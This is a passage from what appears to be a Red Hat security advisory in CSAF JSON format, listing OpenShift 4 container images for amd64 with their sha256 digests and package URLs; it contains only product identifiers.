"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-cloud-controller-manager-rhel9@sha256%3Ad6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-machine-controllers-rhel9@sha256%3Ab7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Adbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846012"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850085"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3Aac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3Ae0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3Ae42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Accc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773852900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3A131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3A04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3A12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849752"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849096"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848264"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844548"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844548"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3A9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844495"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3A9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844495"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cloud-controller-manager-rhel9@sha256%3A15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cluster-api-controllers-rhel9@sha256%3A3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844526"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850280"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3Ab679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845326"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3Ab6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846658"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-csi-driver-syncer-rhel9@sha256%3Ab40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"product": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"product_id": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/volume-data-source-validator-rhel9@sha256%3A5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-problem-detector-rhel9@sha256%3A37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844461"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
